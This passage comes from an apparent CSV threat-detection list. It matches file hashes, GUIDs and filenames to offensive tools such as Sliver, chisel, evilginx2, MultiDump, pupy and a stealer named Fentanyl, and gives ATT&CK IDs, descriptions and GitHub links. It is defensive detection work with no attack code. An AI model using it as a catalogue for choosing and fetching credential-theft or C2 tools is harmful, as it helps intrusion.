fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0*",".{0,1000}2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd*",".{0,1000}2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2C6D323A-B51F-47CB-AD37-972FD051D475*",".{0,1000}2C6D323A\-B51F\-47CB\-AD37\-972FD051D475.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676*",".{0,1000}2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc*",".{0,1000}2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live 
or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e*",".{0,1000}2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*",".{0,1000}2CFB9E9E\-479D\-4E23\-9A8E\-18C92E06B731.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21*",".{0,1000}2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb*",".{0,1000}2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3*",".{0,1000}2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03*",".{0,1000}2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2D863D7A-A369-419C-B4B3-54BDB88B5816*",".{0,1000}2D863D7A\-A369\-419C\-B4B3\-54BDB88B5816.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","371","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97*",".{0,1000}2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441*",".{0,1000}2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857*",".{0,1000}2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3*",".{0,1000}2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97*",".{0,1000}2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6*",".{0,1000}2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525*",".{0,1000}2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c*",".{0,1000}2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630*",".{0,1000}2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191*",".{0,1000}2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f*",".{0,1000}2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076*",".{0,1000}2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298*",".{0,1000}2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c*",".{0,1000}2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4*",".{0,1000}2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212*",".{0,1000}2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba*",".{0,1000}2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & 
Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77*",".{0,1000}2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7*",".{0,1000}2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911*",".{0,1000}2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244*",".{0,1000}2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game 
Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*2FB94059-2D49-4EEA-AAF8-7E89E249644B*",".{0,1000}2FB94059\-2D49\-4EEA\-AAF8\-7E89E249644B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c*",".{0,1000}2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045*",".{0,1000}2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2john.c",".{0,1000}2john\.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2john.lua*",".{0,1000}2john\.lua.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2john.pl*",".{0,1000}2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2john.py*",".{0,1000}2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13*",".{0,1000}3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*300875180931c7f9f62908e72395f992510eea9e*",".{0,1000}300875180931c7f9f62908e72395f992510eea9e.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096*",".{0,1000}303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62*",".{0,1000}307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 